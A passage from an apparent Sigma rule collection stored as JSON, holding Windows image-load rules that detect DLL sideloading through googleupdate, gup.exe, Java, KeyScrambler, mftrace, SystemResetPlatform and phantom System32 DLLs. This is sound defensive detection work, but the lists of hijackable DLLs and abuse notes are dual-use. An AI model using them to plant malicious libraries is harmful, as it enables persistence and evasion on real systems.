'\\uiautomationcore.dll'\n            - '\\uireng.dll'\n            - '\\uiribbon.dll'\n            - '\\umpdc.dll'\n            - '\\unattend.dll'\n            - '\\updatepolicy.dll'\n            - '\\upshared.dll'\n            - '\\urlmon.dll'\n            - '\\userenv.dll'\n            - '\\utildll.dll'\n            - '\\uxinit.dll'\n            - '\\uxtheme.dll'\n            - '\\vaultcli.dll'\n            - '\\vdsutil.dll'\n            - '\\version.dll'\n            - '\\virtdisk.dll'\n            - '\\vssapi.dll'\n            - '\\vsstrace.dll'\n            - '\\wbemprox.dll'\n            - '\\wbemsvc.dll'\n            - '\\wcmapi.dll'\n            - '\\wcnnetsh.dll'\n            - '\\wdi.dll'\n            - '\\wdscore.dll'\n            - '\\webservices.dll'\n            - '\\wecapi.dll'\n            - '\\wer.dll'\n            - '\\wevtapi.dll'\n            - '\\whhelper.dll'\n            - '\\wimgapi.dll'\n            - '\\winbio.dll'\n            - '\\winbrand.dll'\n            - '\\windows.storage.dll'\n            - '\\windows.storage.search.dll'\n            - '\\windows.ui.immersive.dll'\n            - '\\windowscodecs.dll'\n            - '\\windowscodecsext.dll'\n            - '\\windowsudk.shellcommon.dll'\n            - '\\winhttp.dll'\n            - '\\wininet.dll'\n            - '\\winipsec.dll'\n            - '\\winmde.dll'\n            - '\\winmm.dll'\n            - '\\winnsi.dll'\n            - '\\winrnr.dll'\n            - '\\winscard.dll'\n            - '\\winsqlite3.dll'\n            - '\\winsta.dll'\n            - '\\winsync.dll'\n            - '\\wkscli.dll'\n            - '\\wlanapi.dll'\n            - '\\wlancfg.dll'\n            - '\\wldp.dll'\n            - '\\wlidprov.dll'\n            - '\\wmiclnt.dll'\n            - '\\wmidcom.dll'\n            - '\\wmiutils.dll'\n            - '\\wmpdui.dll'\n            - '\\wmsgapi.dll'\n            - '\\wofutil.dll'\n            - '\\wpdshext.dll'\n            - '\\wscapi.dll'\n            - '\\wsdapi.dll'\n            - '\\wshbth.dll'\n            - '\\wshelper.dll'\n            - '\\wsmsvc.dll'\n            - '\\wtsapi32.dll'\n            - '\\wwancfg.dll'\n            - '\\wwapi.dll'\n            - '\\xmllite.dll'\n            - '\\xolehlp.dll'\n            - '\\xpsservices.dll'\n            - '\\xwizards.dll'\n            - '\\xwtpw32.dll'\n            # From https://github.com/XForceIR/SideLoadHunter/blob/main/SideLoads/README.md\n            - '\\amsi.dll'\n            - '\\appraiser.dll'\n            - '\\COMRES.DLL'\n            - '\\cryptnet.dll'\n            - '\\DispBroker.dll'\n            - '\\dsound.dll'\n            - '\\dxilconv.dll'\n            - '\\FxsCompose.dll'\n            - '\\FXSRESM.DLL'\n            - '\\msdtcVSp1res.dll'\n            - '\\PrintIsolationProxy.dll'\n            - '\\rdpendp.dll'\n            - '\\rpchttp.dll'\n            - '\\storageusage.dll'\n            - '\\utcutil.dll'\n            - '\\WfsR.dll'\n            # The DLLs below exists in \"C:\\Windows\\System32\\DriverStore\\FileRepository\\\" folder. But there is also a copy located in \"C:\\ProgramData\\Package Cache\\XXXXXXX\\Graphics\\\". If you see them being loaded from there. Please comment them out, don't add a filter for ProgramData :)\n            - '\\igd10iumd64.dll'\n            - '\\igd12umd64.dll'\n            - '\\igdumdim64.dll'\n            - '\\igdusc64.dll'\n            # Other\n            - '\\TSMSISrv.dll'\n            - '\\TSVIPSrv.dll'\n            - '\\wbemcomn.dll'\n            - '\\WLBSCTRL.dll'\n            - '\\wow64log.dll'\n            - '\\WptsExtensions.dll'\n    filter_main_generic:\n        # Note: this filter is generic on purpose to avoid insane amount of FP from legitimate third party applications. A better approach would be to baseline everything and add specific filters to avoid blind spots\n        ImageLoaded|contains:\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\$WinREAgent\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SystemTemp\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Windows\\SyChpe32\\' # “hybrid” binaries containing x86-to-ARM stubs to improve the x86 emulation performance\n    filter_main_windows_temp:\n        ImageLoaded|startswith: 'C:\\Windows\\Temp\\'\n        Image|startswith:\n            - 'C:\\Windows\\WinSxS\\arm64'\n            - 'C:\\Windows\\UUS\\arm64\\'\n        Image|endswith:\n            - '\\TiWorker.exe'\n            - '\\wuaucltcore.exe'\n    filter_main_dot_net:\n        ImageLoaded|startswith: 'C:\\Windows\\Microsoft.NET\\'\n        ImageLoaded|endswith: '\\cscui.dll'\n    filter_main_defender:\n        ImageLoaded|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        ImageLoaded|endswith: '\\version.dll'\n    filter_main_directx:\n        ImageLoaded|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_'\n        ImageLoaded|endswith: '\\d3dx9_43.dll'\n    filter_optional_exchange:\n        ImageLoaded|startswith: 'C:\\Program Files\\Microsoft\\Exchange Server\\'\n        ImageLoaded|endswith: '\\mswb7.dll'\n    filter_optional_arsenal_image_mounter:\n        ImageLoaded|startswith: 'C:\\Program Files\\Arsenal-Image-Mounter-'\n        ImageLoaded|endswith:\n            - '\\mi.dll'\n            - '\\miutils.dl'\n    filter_optional_office_appvpolicy:\n        Image: 'C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe'\n        ImageLoaded: 'C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll'\n    filter_optional_azure:\n        ImageLoaded|startswith: 'C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\'\n    filter_optional_dell:\n        Image|contains:\n            - 'C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs'\n            - 'C:\\Windows\\System32\\backgroundTaskHost.exe'\n        ImageLoaded|startswith: 'C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs'\n    filter_optional_dell_wldp:\n        Image|startswith: 'C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs'\n        Image|endswith: '\\wldp.dll'\n    filter_optional_checkpoint:\n        Image|startswith:\n            - 'C:\\Program Files\\CheckPoint\\'\n            - 'C:\\Program Files (x86)\\CheckPoint\\'\n        Image|endswith: '\\SmartConsole.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\CheckPoint\\'\n            - 'C:\\Program Files (x86)\\CheckPoint\\'\n        ImageLoaded|endswith: '\\PolicyManager.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLLs mentioned in this rule\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_goopdate.yml",
    "content": "title: Potential Goopdate.DLL Sideloading\nid: b6188d2f-b3c4-4d2c-a17d-9706e0851af0\nstatus: test\ndescription: Detects potential DLL sideloading of \"goopdate.dll\", a DLL used by googleupdate.exe\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2025-10-07\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\goopdate.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            # Many third party chromium based apps use this DLLs. It's better to create a baseline and add specific filters\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n    filter_optional_dropbox_installer_temp:\n        Image|contains|all:\n            - '\\AppData\\Local\\Temp\\GUM'\n            - '.tmp\\Dropbox'\n        ImageLoaded|contains|all:\n            - '\\AppData\\Local\\Temp\\GUM'\n            - '.tmp\\goopdate.dll'\n    filter_optional_googleupdate_temp:\n        Image|contains:\n            - '\\AppData\\Local\\Temp\\GUM'\n            - ':\\Windows\\SystemTemp\\GUM'\n        Image|endswith: '.tmp\\GoogleUpdate.exe'\n        ImageLoaded|contains:\n            - '\\AppData\\Local\\Temp\\GUM'\n            - ':\\Windows\\SystemTemp\\GUM'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.\n    - Other third party chromium browsers located in AppData\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_gup_libcurl.yml",
    "content": "title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE\nid: e49b5745-1064-4ac1-9a2e-f687bc2dd37e\nstatus: test\ndescription: Detects potential DLL sideloading of \"libcurl.dll\" by the \"gup.exe\" process from an uncommon location\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\gup.exe'\n        ImageLoaded|endswith: '\\libcurl.dll'\n    filter_main_notepad_plusplus:\n        Image|endswith: '\\Notepad++\\updater\\GUP.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_iviewers.yml",
    "content": "title: Potential Iviewers.DLL Sideloading\nid: 4c21b805-4dd7-469f-b47d-7383a8fcb437\nstatus: test\ndescription: Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)\nreferences:\n    - https://www.secureworks.com/research/shadowpad-malware-analysis\nauthor: X__Junior (Nextron Systems)\ndate: 2023-03-21\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\iviewers.dll'\n    filter:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Windows Kits\\'\n            - 'C:\\Program Files\\Windows Kits\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_jli.yml",
    "content": "title: Potential JLI.dll Side-Loading\nid: 7a3b6d1f-4a2b-4f8c-9d7e-e9f8cbf21a35\nstatus: experimental\ndescription: |\n    Detects potential DLL side-loading of jli.dll.\n    JLI.dll has been observed being side-loaded by Java processes by various threat actors, including APT41, XWorm,\n    and others in order to load malicious payloads in context of legitimate Java processes.\nreferences:\n    - https://securelist.com/apt41-in-africa/116986/\n    - https://lab52.io/blog/snake-keylogger-in-geopolitical-affairs-abuse-of-trusted-java-utilities-in-cybercrime-operations/\n    - https://hijacklibs.net/entries/3rd_party/oracle/jli.html\n    - https://www.proofpoint.com/us/blog/threat-insight/phish-china-aligned-espionage-actors-ramp-up-taiwan-semiconductor-targeting\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-25\nmodified: 2025-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\jli.dll'\n    filter_main_legitimate_install_paths:\n        ImageLoaded|startswith:\n            # Keeping the paths generic as jli.dll was found inside various directories of installed software\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n        Description: 'OpenJDK Platform binary'\n        OriginalFileName: 'jli.dll'\n        Product|startswith: 'OpenJDK Platform'\n        Signed: 'true'\n    filter_optional_eclipse:\n        ImageLoaded|startswith: 'C:\\eclipse\\plugins\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_jsschhlp.yml",
    "content": "title: Potential DLL Sideloading Via JsSchHlp\nid: 68654bf0-4412-43d5-bfe8-5eaa393cd939\nstatus: test\ndescription: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor\nreferences:\n    - https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/\n    - http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp\nauthor: frack113\ndate: 2022-12-14\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\JSESPR.dll'\n    filter:\n        ImageLoaded|startswith: 'C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_keyscrambler.yml",
    "content": "title: Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE\nid: d2451be2-b582-4e15-8701-4196ac180260\nrelated:\n    - id: ca5583e9-8f80-46ac-ab91-7f314d13b984\n      type: similar\nstatus: test\ndescription: |\n    Detects potential DLL side loading of \"KeyScramblerIE.dll\" by \"KeyScrambler.exe\".\n    Various threat actors and malware have been found side loading a masqueraded \"KeyScramblerIE.dll\" through \"KeyScrambler.exe\".\nreferences:\n    - https://thehackernews.com/2024/03/two-chinese-apt-groups-ramp-up-cyber.html\n    - https://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/\n    - https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/\n    - https://twitter.com/Max_Mal_/status/1775222576639291859\n    - https://twitter.com/DTCERT/status/1712785426895839339\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-04-15\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\KeyScrambler.exe'\n            - '\\KeyScramblerLogon.exe'\n        ImageLoaded|endswith: '\\KeyScramblerIE.dll'\n    filter_main_legitimate_path:\n        Image|contains:\n            - 'C:\\Program Files (x86)\\KeyScrambler\\'\n            - 'C:\\Program Files\\KeyScrambler\\'\n        ImageLoaded|contains:\n            - 'C:\\Program Files (x86)\\KeyScrambler\\'\n            - 'C:\\Program Files\\KeyScrambler\\'\n    filter_main_signature:\n        Signature: 'QFX Software Corporation'\n        SignatureStatus: 'Valid'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_libvlc.yml",
    "content": "title: Potential Libvlc.DLL Sideloading\nid: bf9808c4-d24f-44a2-8398-b65227d406b6\nstatus: test\ndescription: Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html\n    - https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html\nauthor: X__Junior\ndate: 2023-04-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\libvlc.dll'\n    filter_main_vlc:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\VideoLAN\\VLC\\'\n            - 'C:\\Program Files\\VideoLAN\\VLC\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives are expected if VLC is installed in non-default locations\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_mfdetours.yml",
    "content": "title: Potential Mfdetours.DLL Sideloading\nid: d2605a99-2218-4894-8fd3-2afb7946514d\nstatus: test\ndescription: Detects potential DLL sideloading of \"mfdetours.dll\". While using \"mftrace.exe\" it can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\mfdetours.dll'\n    filter_main_legit_path:\n        ImageLoaded|contains: ':\\Program Files (x86)\\Windows Kits\\10\\bin\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_mfdetours_unsigned.yml",
    "content": "title: Unsigned Mfdetours.DLL Sideloading\nid: 948a0953-f287-4806-bbcb-3b2e396df89f\nrelated:\n    - id: d2605a99-2218-4894-8fd3-2afb7946514d\n      type: similar\nstatus: test\ndescription: Detects DLL sideloading of unsigned \"mfdetours.dll\". Executing \"mftrace.exe\" can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-11\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\mfdetours.dll'\n    filter_main_legit_path:\n        ImageLoaded|contains: ':\\Program Files (x86)\\Windows Kits\\10\\bin\\'\n        SignatureStatus: 'Valid'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_mpsvc.yml",
    "content": "title: Potential DLL Sideloading Of MpSvc.DLL\nid: 5ba243e5-8165-4cf7-8c69-e1d3669654c1\nstatus: test\ndescription: Detects potential DLL sideloading of \"MpSvc.dll\".\nreferences:\n    - https://hijacklibs.net/entries/microsoft/built-in/mpsvc.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema\ndate: 2024-07-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\MpSvc.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLL mentioned in this rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_mscorsvc.yml",
    "content": "title: Potential DLL Sideloading Of MsCorSvc.DLL\nid: cdb15e19-c2d0-432a-928e-e49c8c60dcf2\nstatus: test\ndescription: Detects potential DLL sideloading of \"mscorsvc.dll\".\nreferences:\n    - https://hijacklibs.net/entries/microsoft/built-in/mscorsvc.html\nauthor: Wietze Beukema\ndate: 2024-07-11\nmodified: 2025-02-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\mscorsvc.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Windows\\Microsoft.NET\\Framework\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework64\\'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate applications loading their own versions of the DLL mentioned in this rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_non_existent_dlls.yml",
    "content": "title: Potential DLL Sideloading Of Non-Existent DLLs From System Folders\nid: 6b98b92b-4f00-4f62-b4fe-4d1920215771\nrelated:\n    - id: df6ecb8b-7822-4f4b-b412-08f524b4576c # FileEvent rule\n      type: similar\n    - id: 602a1f13-c640-4d73-b053-be9a2fa58b77\n      type: obsolete\nstatus: test\ndescription: |\n    Detects loading of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes, potentially indicating phantom DLL hijacking attempts.\n    Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.\nreferences:\n    - http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html\n    - https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/\n    - https://decoded.avast.io/martinchlumecky/png-steganography/\n    - https://github.com/Wh04m1001/SysmonEoP\n    - https://itm4n.github.io/cdpsvc-dll-hijacking/\n    - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n    - https://securelist.com/passiveneuron-campaign-with-apt-implants-and-cobalt-strike/117745/\n    - https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/\n    - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n    - https://www.hexacorn.com/blog/2025/06/14/wermgr-exe-boot-offdmpsvc-dll-lolbin/\n    - https://www.hexacorn.com/blog/2025/06/14/wpr-exe-boottrace-phantom-dll-axeonoffhelper-dll-lolbin/\n    - https://x.com/0gtweet/status/1564131230941122561\nauthor: Nasreddine Bencherchali (Nextron Systems), SBousseaden\ndate: 2022-12-09\nmodified: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            # Add other DLLs\n            - ':\\Windows\\System32\\axeonoffhelper.dll'\n            - ':\\Windows\\System32\\cdpsgshims.dll'\n            - ':\\Windows\\System32\\oci.dll'\n            - ':\\Windows\\System32\\offdmpsvc.dll'\n            - ':\\Windows\\System32\\shellchromeapi.dll'\n            - ':\\Windows\\System32\\TSMSISrv.dll'\n            - ':\\Windows\\System32\\TSVIPSrv.dll'\n            - ':\\Windows\\System32\\wbem\\wbemcomn.dll'\n            - ':\\Windows\\System32\\WLBSCTRL.dll'\n            - ':\\Windows\\System32\\wow64log.dll'\n            - ':\\Windows\\System32\\WptsExtensions.dll'\n    filter_main_ms_signed:\n        Signed: 'true'\n        SignatureStatus: 'Valid'\n        # There could be other signatures (please add when found)\n        Signature: 'Microsoft Windows'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_office_dlls.yml",
    "content": "title: Microsoft Office DLL Sideload\nid: 829a3bdf-34da-4051-9cf4-8ed221a8ae4f\nstatus: test\ndescription: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-08-17\nmodified: 2023-03-15\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\outllib.dll'\n    filter:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\Microsoft Office\\OFFICE'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\OFFICE'\n            - 'C:\\Program Files\\Microsoft Office\\Root\\OFFICE'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_python.yml",
    "content": "title: Potential Python DLL SideLoading\nid: d36f7c12-14a3-4d48-b6b8-774b9c66f44d\nstatus: test\ndescription: Detects potential DLL sideloading of Python DLL files.\nreferences:\n    - https://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/\n    - https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\n    - https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-10-06\nmodified: 2025-08-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\python39.dll'\n            - '\\python310.dll'\n            - '\\python311.dll'\n            - '\\python312.dll'\n    filter_main_default_install_paths:\n        - ImageLoaded|startswith:\n              - 'C:\\Program Files\\Python3'\n              - 'C:\\Program Files (x86)\\Python3'\n        - ImageLoaded|contains: '\\AppData\\Local\\Programs\\Python\\Python3'\n    filter_optional_visual_studio:\n        ImageLoaded|startswith: 'C:\\Program Files\\Microsoft Visual Studio\\'\n    filter_optional_anaconda:\n        ImageLoaded|startswith: 'C:\\ProgramData\\Anaconda3\\' # Comment out if you don't use Anaconda in your environment\n    filter_optional_cpython:\n        ImageLoaded|contains:\n            - '\\cpython\\externals\\'\n            - '\\cpython\\PCbuild\\'\n    filter_optional_pyinstaller:\n        # Triggered by programs bundled with PyInstaller\n        ImageLoaded|startswith: 'C:\\Users'\n        ImageLoaded|contains: '\\AppData\\Local\\Temp\\_MEI'\n    filter_main_legit_signature_details:\n        Product: 'Python'\n        Signed: 'true'\n        Description: 'Python'\n        Company: 'Python Software Foundation'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software using Python DLLs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_rcdll.yml",
    "content": "title: Potential Rcdll.DLL Sideloading\nid: 6e78b74f-c762-4800-82ad-f66787f10c8a\nstatus: test\ndescription: Detects potential DLL sideloading of rcdll.dll\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html\nauthor: X__Junior (Nextron Systems)\ndate: 2023-03-13\nmodified: 2023-03-15\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\rcdll.dll'\n    filter:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files (x86)\\Windows Kits\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_rjvplatform_default_location.yml",
    "content": "title: Potential RjvPlatform.DLL Sideloading From Default Location\nid: 259dda31-b7a3-444f-b7d8-17f96e8a7d0d\nstatus: test\ndescription: Detects loading of \"RjvPlatform.dll\" by the \"SystemResetPlatform.exe\" binary which can be abused as a method of DLL side loading since the \"$SysReset\" directory isn't created by default.\nreferences:\n    - https://twitter.com/0gtweet/status/1666716511988330499\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image: 'C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe'\n        ImageLoaded: 'C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_rjvplatform_non_default_location.yml",
    "content": "title: Potential RjvPlatform.DLL Sideloading From Non-Default Location\nid: 0e0bc253-07ed-43f1-816d-e1b220fe8971\nstatus: test\ndescription: Detects potential DLL sideloading of \"RjvPlatform.dll\" by \"SystemResetPlatform.exe\" located in a non-default location.\nreferences:\n    - https://twitter.com/0gtweet/status/1666716511988330499\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\RjvPlatform.dll'\n        Image: '\\SystemResetPlatform.exe'\n    filter_main_legit_path:\n        Image|startswith: 'C:\\Windows\\System32\\SystemResetPlatform\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_robform.yml",
